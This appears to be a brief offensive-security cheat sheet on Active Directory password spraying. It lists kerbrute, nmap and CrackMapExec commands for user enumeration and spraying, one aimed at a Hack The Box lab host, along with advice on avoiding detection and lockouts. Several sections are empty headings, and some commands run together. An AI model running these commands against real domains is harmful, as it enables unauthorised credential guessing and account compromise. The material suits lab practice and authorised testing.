5.Password Spraying Overview
1. User Enumeration with Kerbrute
# Using a predefined username list
kerbrute userenum --dc <domain-controller> -d <domain> usernames.txt
# Using a generated username list (GUIDs example)
for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do echo $x; done > usernames.txtnmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=frizz.htb 10.10.11.60
2. Password Spraying with Kerbrute
kerbrute passwordspray --dc <domain-controller> -d <domain> -U usernames.txt -p <common-password>3. Password Spraying with CrackMapExec (CME)
cme smb <target-ip> -u usernames.txt -p <password> --no-bruteforce4. Obtaining Password Policy (if internal access is available)
net accounts
Get-ADDefaultDomainPasswordPolicy5. Delay Consideration Between Sprays (Bash Example)
6. Handling Large User Lists (Bash Example)
7. Post-Spray Enumeration
8. Automation (Basic Script)
Notes:
- Adjust delay times based on password policy.
- Always confirm the password policy before attempting spraying.
- Use minimal attempts to avoid detection and lockouts.
Last updated